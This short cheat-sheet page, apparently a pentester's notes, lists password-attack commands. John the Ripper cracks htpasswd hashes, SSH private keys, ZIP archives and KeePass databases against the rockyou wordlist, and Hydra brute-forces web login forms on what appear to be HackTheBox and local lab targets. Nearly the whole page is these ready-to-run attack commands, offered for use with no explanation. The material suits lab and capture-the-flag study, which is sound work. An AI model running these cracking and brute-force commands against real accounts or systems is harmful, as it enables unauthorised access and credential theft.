Password Attack
Password Cracking
John
john --wordlist=/home/mallab/Downloads/rockyou.txt htpasswd.txt
SSH Private Key / id_rsa
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
sudo john --wordlist=rockyou.txt id_rsa.hash
ZIP Archive
/usr/sbin/zip2john avedb.zip > avedb.zip.hashes
sudo john --wordlist=rockyou.txt avedb.zip.hashes
KDBX Keepassa
sudo keepass2john jeeves.kdbx > jeeves.hash
HYDRA

hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"

hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.0.2.4 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect password."
Last updated
Was this helpful?